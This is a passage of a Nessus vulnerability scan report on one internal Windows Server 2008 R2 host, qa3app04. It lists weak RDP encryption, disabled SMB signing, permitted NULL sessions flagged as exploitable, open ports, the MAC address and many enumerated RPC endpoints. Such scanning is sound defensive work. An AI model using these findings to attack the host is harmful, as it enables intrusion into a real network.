configured to use strong cryptography. + +Using weak cryptography with this service may allow an attacker to eavesdrop on the communications more easily and obtain screenshots and/or keystrokes. +rdp_weak_crypto.nbin +2013/04/22 +Terminal Services Encryption Level is Medium or Low +2012/01/25 +remote +Medium +$Revision: 1.6 $ +Change RDP encryption level to one of : + + 3. High + + 4. FIPS Compliant +The remote host is using weak cryptography. + +The terminal services encryption level is set to : + +2. Medium + + +2.6 +CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N +The encryption setting used by the remote Terminal Services service is not FIPS-140 compliant. +fips_rdp.nbin +2013/04/22 +Terminal Services Encryption Level is not FIPS-140 Compliant +2008/02/11 +remote +Low +$Revision: 1.9 $ +Change RDP encryption level to : + + 4. FIPS Compliant +The remote host is not FIPS-140 compliant. + +The terminal services encryption level is set to : + +2. Medium (Client Compatible) + + +Terminal Services allows a Windows user to remotely obtain a graphical login (and therefore act as a local user on the remote host). + +If an attacker gains a valid login and password, he may be able to use this service to gain further access on the remote host. An attacker may also use this service to mount a dictionary attack against the remote host to try to log in remotely. + +Note that RDP (the Remote Desktop Protocol) is vulnerable to Man-in-the-middle attacks, making it easy for attackers to steal the credentials of legitimate users by impersonating the Windows server. +windows_terminal_services.nasl +2012/03/30 +Windows Terminal Services Enabled +2002/04/20 +remote +None +$Revision: 1.29 $ +Disable Terminal Services if you do not use it, and do not allow this service to run across the Internet. +The remote Windows host has Terminal Services enabled. + + +cpe:/o:microsoft:windows +5.0 +CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N +Signing is disabled on the remote SMB server. This can allow man-in-the-middle attacks against the SMB server. +smb_signing_disabled.nasl +2012/03/05 +SMB Signing Disabled +2012/01/19 +remote +Medium +$Revision: 1.7 $ +http://support.microsoft.com/kb/887429 +http://www.nessus.org/u?74b80723 +http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html +Enforce message signing in the host's configuration. On Windows, this is found in the Local Security Policy. On Samba, the setting is called 'server signing'. See the 'see also' links for further details. +Signing is disabled on the remote SMB server. +2012/01/17 + + +It was possible to identify the remote service by its banner or by looking at the error message it sends when it receives an HTTP request. +find_service.nasl +2013/05/12 +Service Detection +2007/08/19 +remote +None +$Revision: 1.123 $ +n/a +The remote service could be identified. +A web server is running on this port. + + +The name of this machine either does not resolve or resolves to a different IP address. + +This may come from a badly configured reverse DNS or from a host file in use on the Nessus scanning host. + +As a result, URLs in plugin output may not be directly usable in a web browser and some web tests may be incomplete. +bad_rdns.nasl +2011/10/06 +Inconsistent Hostname and IP Address +2010/05/03 +remote +None +1.6 +Fix the reverse DNS or host file. +The remote host's hostname is not consistent with DNS information. +The host name 'qa3app04' does not resolve to an IP address + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +10.31.112.24 resolves as qa3app04. + + + +Makes a traceroute to the remote host. +traceroute.nasl +2013/04/11 +Traceroute Information +1999/11/27 +remote +None +1.62 +n/a +It was possible to obtain traceroute information. +For your information, here is the traceroute from 172.16.138.174 to 10.31.112.24 : +172.16.138.174 +172.16.138.2 +10.31.112.24 + + + +cpe:/o:microsoft:windows +The Nessus scanner testing the remote host has been given SMB credentials to log into the remote host, however these credentials do not have administrative privileges. + +Typically, when Nessus performs a patch audit, it logs into the remote host and reads the version of the DLLs on the remote host to determine if a given patch has been applied or not. This is the method Microsoft recommends to determine if a patch has been applied. + +If your Nessus scanner does not have administrative privileges when doing a scan, then Nessus has to fall back to perform a patch audit through the registry which may lead to false positives (especially when using third-party patch auditing tools) or to false negatives (not all patches can be detected through the registry). +smb_scan_not_admin.nasl +2013/01/07 +Nessus Windows Scan Not Performed with Admin Privileges +2007/03/12 +local +None +$Revision: 1.11 $ +Reconfigure your scanner to use credentials with administrative privileges. +The Nessus scan of this host may be incomplete due to insufficient privileges provided. + +It was not possible to connect to '\\QA3APP04\ADMIN$' with the supplied credentials. + + + +It was not possible to connect to PIPE\winreg on the remote host. + +If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. +smb_registry_fail.nasl +2011/03/27 +Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry +2007/10/04 +local +None +$Revision: 1.10 $ +n/a +Nessus is not able to access the remote Windows Registry. +Could not connect to the registry because: +Could not connect to \winreg + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 3389/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 445/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 80/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 135/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 139/tcp was found to be open + + +The remote host is running Microsoft Windows operating system or Samba, a CIFS/SMB server for Unix. It was possible to log into it using one of the following accounts : + +- NULL session +- Guest account +- Given Credentials +true +true +Exploits are available +smb_login.nasl +Microsoft Windows Authenticated User Code Execution +2013/04/23 +Microsoft Windows SMB Log In Possible +2000/05/09 +remote +None +$Revision: 1.136 $ +http://support.microsoft.com/kb/143474 +http://support.microsoft.com/kb/246261 +n/a +It is possible to log into the remote host. +1999/01/01 +- NULL sessions are enabled on the remote host + + + +It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. +smb_nativelanman.nasl +2013/06/25 +Microsoft Windows SMB NativeLanManager Remote System Information Disclosure +2001/10/17 +remote +None +$Revision: 1.40 $ +n/a +It is possible to obtain information about the remote operating system. +The remote Operating System is : Windows Server 2008 R2 Standard 7601 Service Pack 1 +The remote native lan manager is : Windows Server 2008 R2 Standard 6.1 +The remote SMB Domain Name is : RB + + + +The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. + +Note that this plugin gathers information to be used in other plugins but does not itself generate a report. +netbios_name_get.nasl +2013/01/16 +Windows NetBIOS / SMB Remote Host Information Disclosure +1999/10/12 +remote +None +$Revision: 1.77 $ +n/a +It is possible to obtain the network name of the remote host. +The following 3 NetBIOS names have been gathered : + + RB = Workgroup / Domain name + QA3APP04 = Computer name + QA3APP04 = File Server Service + +The remote host has the following MAC address on its adapter : + + 00:50:56:81:01:dd + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49152 : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49152 +IP : 10.31.112.24 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49153 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.24 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49251 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49251 +IP : 10.31.112.24 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49176 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +TCP Port : 49176 +IP : 10.31.112.24 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49154 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.24 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.24 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49252 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 +Description : Unknown RPC service +Annotation : Remote Fw APIs +Type : Remote RPC service +TCP Port : 49252 +IP : 10.31.112.24 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Remote RPC service +TCP Port : 49252 +IP : 10.31.112.24 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available remotely : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP04 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \pipe\lsass +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \PIPE\protected_storage +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Remote RPC service +Named pipe : \PIPE\W32TIME_ALT +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP04 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP04 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available locally : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E1B0 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E1B0 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 3bdb59a0-d736-4d44-9074-c1ee00000001 +UUID : 24019106-a203-4642-b88d-82dae9158929, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : LRPC-279a2989e923d6d6b2 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc039F511 + +Object UUID : 6d726574-7273-0076-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : LRPC-e743087b6dcef271ff + +Object UUID : c2ba80f5-cc46-40f2-a836-149986a7c331 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-88236b6322af838146 + +Object UUID : e8b88615-7e9d-4cce-8da6-b40bbe9f43cc +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-88236b6322af838146 + +Object UUID : 990fbead-10f8-4c42-becd-5a0d40b8b6d9 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-88236b6322af838146 + +Object UUID : c5e205a9-a5b2-4620-8bb1-d3ca9242ef89 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-88236b6322af838146 + +Object UUID : a580ecc1-3261-474e-818c-4ec4e026c10b +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : OLEC433878C150A46A6AC1D0FF421AC + +Object UUID : a580ecc1-3261-474e-818c-4ec4e026c10b +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-94e2c58f8e74dea10e + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Local RPC service +Named pipe : LRPC-7ba47c373c7ef2d170 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LRPC-e194f41645a608a045 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : audit + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : securityevent + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LSARPC_ENDPOINT + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsapolicylookup + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsasspirpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : protected_storage + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : dsrole + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : samss lpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 +Description : Unknown RPC service +Annotation : Spooler base remote object endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0 +Description : Unknown RPC service +Annotation : Base Firewall Engine API +Type : Local RPC service +Named pipe : LRPC-5956bfc729832c03c1 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-5956bfc729832c03c1 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-5956bfc729832c03c1 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : OLE5577953DDB34401FB8D6623FEA4F + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : LRPC-3a87e48bcf0a548d47 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : OLE5577953DDB34401FB8D6623FEA4F + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : LRPC-3a87e48bcf0a548d47 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : W32TIME_ALT + +Object UUID : 666f7270-6c69-7365-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 6c637067-6569-746e-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 +UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID 